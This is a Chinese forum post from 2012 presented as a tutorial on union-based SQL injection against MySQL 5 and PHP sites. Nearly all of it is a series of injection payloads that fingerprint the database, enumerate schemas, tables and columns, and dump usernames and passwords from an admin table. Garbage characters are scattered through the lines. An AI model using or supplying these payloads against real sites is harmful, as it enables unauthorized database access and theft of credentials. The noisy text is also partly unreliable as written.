" P" r- W# [, F. e( x
教程内容:Mysql 5+php 注入7 i. j7 `+ B: j# Z& v: K& ~
. {2 T, f. w7 \5 g2 t3 U
2 ~/ Q% }1 U6 [9 W# Z% b
$ `% p: y6 [. k一.查看MYSQL基本信息(库名,版本,用户)
( ?0 V* @+ F }( E/ x5 H8 l/ \ ~/ ?' W0 I3 |
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
8 ?5 v0 E5 W8 W
0 W5 C- E! b7 C0 ?+ W二.查数据库1 F9 v6 ~9 C/ Q; e: _9 N0 ?' z+ G
, K& ~; R* k. |& Kand 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
$ f! q: k9 C$ y Zlimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。; }% W) U6 j* \
) ?. D3 b4 a7 k$ N2 w" a
三.暴表
) g8 @* T4 Q( ]" u! f2 ^) d
( [" @1 |3 y) P' Fand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*- g, G: Q8 ]. ^
: L; O0 U; w/ e) T% N* o. `' a4 B
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。: L& r0 [6 N& n& b7 ]
# ^0 N- Z; A Z9 y* A" s" U+ Z- t
四.暴字段2 x u5 c* s6 I9 |! S+ \* Z
/ V( B. z) ~6 W# g5 v6 P
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
6 C% [ [! a q- Q/ x4 d6 J3 M% A7 t0 T0 Y
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
9 v f0 D; q0 q9 E' l' ~5 n7 P6 C( p4 G/ T1 U: u( t0 B( }# y
五.暴数据5 s4 [7 T$ x% N7 z! P2 @/ V4 q
- b( Y- L9 _( C9 x8 ~% a& R
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*$ f% {. G! m4 N4 T' {
2 C1 b! F+ L7 U
9 l# i. G3 Q& k1 x8 E这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
; k. z; B. Z0 M# X; T9 e% S |
发表于 2012-9-13 16:27:53
收藏
支持
反对